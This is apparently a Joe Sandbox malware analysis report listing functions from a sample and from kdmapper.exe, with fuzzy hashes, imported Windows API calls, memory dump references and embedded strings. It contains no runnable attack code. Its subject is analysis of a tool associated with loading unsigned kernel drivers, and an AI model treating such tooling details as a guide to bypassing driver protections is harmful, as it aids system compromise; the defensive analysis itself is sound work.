Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: c1b0453fadfa5e8b22363265a7475aa739211c4a2fd6e5f190d4c8c9ac3e05fc
Instruction ID: 137d6db5424bd253b29497971a641c3d2dee2f7e2c1de19933a5c9ade3b87fcc
Opcode Fuzzy Hash: c1b0453fadfa5e8b22363265a7475aa739211c4a2fd6e5f190d4c8c9ac3e05fc
Instruction Fuzzy Hash: 4631F561B09B82E5EE159B1AA51636CA351BF08FD4F140239DE5D8BBEDDE7CE085C300

Function 00007FF68B4C7290 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b4c77a211957641976add56281403e4dfe22f0d166586a5037c985053f08a19
Instruction ID: 42d2e243cf22dadaf9bb932bbc5008fb1c6b4e874163859cd261895a5604d56d
Opcode Fuzzy Hash: 9b4c77a211957641976add56281403e4dfe22f0d166586a5037c985053f08a19
Instruction Fuzzy Hash: 86514132608A91C6DB108F69E46136D7BA1FB88F94F64413AEA9D877A8DF7CD449C700

Function 00007FF68B4C9C30 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,00007FF68B4B29C8), ref: 00007FF68B4C9C9D

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 1c1b504eb94143577c8513432c5a5fd7cb917a007a8831c9cc37feba965cd2c2
Instruction ID: 8a8e61c641275e9a50d9b2cca943c54b0f30850c2b758c668c433ba212e1cb32
Opcode Fuzzy Hash: 1c1b504eb94143577c8513432c5a5fd7cb917a007a8831c9cc37feba965cd2c2
Instruction Fuzzy Hash: 4531F363B09782D4FA169B69A5523B82190AF08FF5F240239DE2D477EADE3C95C7C300

Function 00007FF68B4C9280 Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C935C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C9390
memcpy.VCRUNTIME140(?,?,00000000,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C939A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C93C3

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 64ce841dc1b1a1fed0fd60029dc663c1a30d68d1d24ca946da022716c2d9ee9e
Instruction ID: 3c3219ea715c1fb0475bc2e2fb24ae63fe039d5394af2312ad96fafd22d6f2c5
Opcode Fuzzy Hash: 64ce841dc1b1a1fed0fd60029dc663c1a30d68d1d24ca946da022716c2d9ee9e
Instruction Fuzzy Hash: 6931B261B08A41D5EE119B1690162ADA351BF4CFD4F544639DA6D8BBFDDF7CE089C300

Function 00007FF68B4C7690 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,00007FF68B4B2701), ref: 00007FF68B4C76FA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00007FF68B4B2701), ref: 00007FF68B4C7780
memcpy.VCRUNTIME140(00000000,?,?,00007FF68B4B2701), ref: 00007FF68B4C77A6
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C77CA

Part of subcall function 00007FF68B4CAF74: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF68B4C9945,?,?,?,?,?,00007FF68B4C7EB5), ref: 00007FF68B4CAF8E

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 1155477157-0
Opcode ID: 91e93bb7e7692542c29157bc474df596a4174026cb6228c3b22891685a4c76cb
Instruction ID: 7ec08ab4dd8bca33ba581c7eeb730b2986b72af2ee6c1b1a99c9be6ca3c4915a
Opcode Fuzzy Hash: 91e93bb7e7692542c29157bc474df596a4174026cb6228c3b22891685a4c76cb
Instruction Fuzzy Hash: 5031C422A0A745C2EA149B51A4612792691BF08FF0F344B38DABE877E9DE3CF495C300

Function 00007FF68B4BE8C0 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE8F8
memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE998
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4BE9B6

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task
String ID:
API String ID: 326894585-0
Opcode ID: b534d83fd82368a8ab6e12b163f43f4223bfc836c41a8890c4fe8090b5e846ca
Instruction ID: 9d11a71f11f7e52ad8556ecd9d438ff1d837e556dc4ef134544f9a7129e93528
Opcode Fuzzy Hash: b534d83fd82368a8ab6e12b163f43f4223bfc836c41a8890c4fe8090b5e846ca
Instruction Fuzzy Hash: 9021C962A49745C5FB549B96A4423BC2260BF4CBE4F540A38DF7D877EADE7CA486C300

Function 00007FF68B4CBA30 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF68B4CBA79
GetLastError.KERNEL32 ref: 00007FF68B4CBA87
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF68B4C8BE4), ref: 00007FF68B4CBABC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF68B4C8BE4), ref: 00007FF68B4CBACA

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 09bc2dd6ca67bac4e580aad1a412ba4f74ff657ac999759c6b0126dd9bfe66b3
Instruction ID: 765b8c4d74a1296aec7cdbfd6c5a29b948e2882060fe7a64e925c6a758a6ff7b
Opcode Fuzzy Hash: 09bc2dd6ca67bac4e580aad1a412ba4f74ff657ac999759c6b0126dd9bfe66b3
Instruction Fuzzy Hash: F0213872A18B95C6E3508F12A45432EB6A4FB8CF90F140138DB8893B68CF39D509CB00

Function 00007FF68B492130 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B491F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B491F99

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B49216B
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B49217D
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B492185
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4921ED

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintffclosefflushfree
String ID:
API String ID: 2759974054-0
Opcode ID: 00c634840845a2fbbd45c12de3c3f3df9139cd5f19dd2647e30005f7e89698d8
Instruction ID: 1e1841b45f9ede32924792c186792eb29a140058b8b2edadb170de85011bfdf3
Opcode Fuzzy Hash: 00c634840845a2fbbd45c12de3c3f3df9139cd5f19dd2647e30005f7e89698d8
Instruction Fuzzy Hash: AD212135509A82C1EB559F10D9962B863A5FF98F84F0D403ACA5DCB279EF3CA895D310

Function 00007FF68B4B6B50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

__std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF68B4B6BC5

Part of subcall function 00007FF68B4CB9E8: MultiByteToWideChar.KERNEL32 ref: 00007FF68B4CBA04
Part of subcall function 00007FF68B4CB9E8: GetLastError.KERNEL32 ref: 00007FF68B4CBA12

__std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF68B4B6C71

Part of subcall function 00007FF68B4C93D0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C94D3

Strings

Unknown exception, xrefs: 00007FF68B4B6F87

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: __std_fs_convert_narrow_to_wide$ByteCharErrorLastMultiWidememcpy
String ID: Unknown exception
API String ID: 3269794198-410509341
Opcode ID: 296255065dc22a0ccfd8385624fc05b08794b71f588ef43bc7450ce4f62d15fa
Instruction ID: b5204022ce0bf938ec74d977061dd3cff2714fc63683445a4b163f7f2a3d200c
Opcode Fuzzy Hash: 296255065dc22a0ccfd8385624fc05b08794b71f588ef43bc7450ce4f62d15fa
Instruction Fuzzy Hash: 1B31F362A18B85C6EB149FA2950266D62A4FF48FC8F145039DF4D877A8DF3CE451C340

Function 00007FF68B4B1400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF68B4B140B
__std_exception_copy.VCRUNTIME140 ref: 00007FF68B4B1444

Strings

string too long, xrefs: 00007FF68B4B1404

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: Xlength_error@std@@__std_exception_copy
String ID: string too long
API String ID: 127952674-2556327735
Opcode ID: 91b7703d8a468c46f029ff4c06fc218b4d9cb95b0ee727b000b25f8dab4d9274
Instruction ID: c40b0ad50d61385df2f3396615d1cb0241a5e6ac95a6ed3fabe53d664367e24a
Opcode Fuzzy Hash: 91b7703d8a468c46f029ff4c06fc218b4d9cb95b0ee727b000b25f8dab4d9274
Instruction Fuzzy Hash: 33E03961A54A45D0EB118F61E8910A87370FF2CB54B888135C95D87338EF3CA1E9C300

Function 00007FF68B499C40 Relevance: 5.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B499CFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B499D67
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B499FFF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49A020

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: add347d4749a3fadeec7f98867147186dae86bebc7d49907be8afb496cbe6c9c
Instruction ID: d442ab5829d1c180ed165e2caf9e5f2b33728931cc203f5423bef8c83525b642
Opcode Fuzzy Hash: add347d4749a3fadeec7f98867147186dae86bebc7d49907be8afb496cbe6c9c
Instruction Fuzzy Hash: 75B1A522A14B95C6E711DB35944527EB7A4FF9DB84F049336EE8993678EF38E482C700

Function 00007FF68B4934D0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68B4883EF), ref: 00007FF68B49354F
memcpy.VCRUNTIME140(?,?,?,00007FF68B4883EF), ref: 00007FF68B49356B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68B4883EF), ref: 00007FF68B49358B
memcpy.VCRUNTIME140(?,?,?,00007FF68B4883EF), ref: 00007FF68B4935B9

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: a03af4b64075eac189589463203c2f937ad66b6aadfc98da0266888738e420e2
Instruction ID: 2a87ce73e975b202abfbb0d6fd613921266338ce7e4ab6846ea110ca58eaf44c
Opcode Fuzzy Hash: a03af4b64075eac189589463203c2f937ad66b6aadfc98da0266888738e420e2
Instruction Fuzzy Hash: FD31CC72A05A81C6EA14CF6AE6451A8A360FF4CF90B08843ADF5D87769DF3CE4A1C700

Analysis Process: kdmapper.exePID: 2340, Parent PID: 768COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	1500
Total number of Limit Nodes:	43

Executed Functions

Function 00160863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 0016087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0016088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001608BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00160B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00160B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00160B93
ReadFile.KERNEL32(00000000,?,00007FFE,00183C7C,00000000), ref: 00160BB1
CloseHandle.KERNEL32(00000000), ref: 00160C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00160C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00183C7C,?,00000000,?,00000800), ref: 00160C72
GetFileAttributesW.KERNELBASE(?,?,00183C7C,00000800,?,00000000,?,00000800), ref: 00160C9C
GetFileAttributesW.KERNEL32(?,?,00183D44,00000800), ref: 00160CD8

Part of subcall function 0016081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00160836
Part of subcall function 0016081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0015F2D8,Crypt32.dll,00000000,0015F35C,?,?,0015F33E,?,?,?), ref: 00160858

_swprintf.LIBCMT ref: 00160D4A
_swprintf.LIBCMT ref: 00160D96

Part of subcall function 00154092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001540A5

AllocConsole.KERNEL32 ref: 00160D9E
GetCurrentProcessId.KERNEL32 ref: 00160DA8
AttachConsole.KERNEL32(00000000), ref: 00160DAF
_wcslen.LIBCMT ref: 00160DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00160DD5
WriteConsoleW.KERNEL32(00000000), ref: 00160DDC
Sleep.KERNEL32(00002710), ref: 00160DE7
FreeConsole.KERNEL32 ref: 00160DED
ExitProcess.KERNEL32 ref: 00160DF5

Strings

SetDefaultDllDirectories, xrefs: 001608B9
uxtheme.dll, xrefs: 00160D17
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00160D84
DXGIDebug.dll, xrefs: 001608FC, 00160C5E
kernel32, xrefs: 00160873
SetDllDirectoryW, xrefs: 00160888
dwmapi.dll, xrefs: 00160927, 00160D0D

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: b4523615880f4bea977fbe56b67e68a299fa785c227f8ad4d85a6cfb7cf23924
Instruction ID: b4983d6c846063000ac89200c132cf967681d4237f9e69ea2cb5500a84c68367
Opcode Fuzzy Hash: b4523615880f4bea977fbe56b67e68a299fa785c227f8ad4d85a6cfb7cf23924
Instruction Fuzzy Hash: A7D173B1408385ABD321EF50CD48A9FBBE8BB85B04F54491DF6A5A6140DBB09748CFA2

Function 0017A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00175695,00175695,?,?,?,0017ABAC,00000001,00000001,2DE85006), ref: 0017A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0017ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0017AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0017AB35
__freea.LIBCMT ref: 0017AB42

Part of subcall function 00178E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0017CA2C,00000000,?,00176CBE,?,00000008,?,001791E0,?,?,?), ref: 00178E38

__freea.LIBCMT ref: 0017AB4B
__freea.LIBCMT ref: 0017AB70

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 04cf03709b1f0853d275f06598e20a1c91e5602f96f4f19459840ead16750e52
Instruction ID: 564772627892c97156179dd5745509ab7f3e526e12b8ff25bcceef065c9259ad
Opcode Fuzzy Hash: 04cf03709b1f0853d275f06598e20a1c91e5602f96f4f19459840ead16750e52
Instruction Fuzzy Hash: 2651BF72610216ABDB298E64CC41EAFB7BAEFD4750FA58629FC08D7140EB34DD50C792

Function 001598E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00157760,?,00000005,?,00000011), ref: 0015995F
GetLastError.KERNEL32(?,?,00157760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0015996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00157760,?,00000005,?), ref: 001599A2
GetLastError.KERNEL32(?,?,00157760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001599AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00157760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001599F9

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
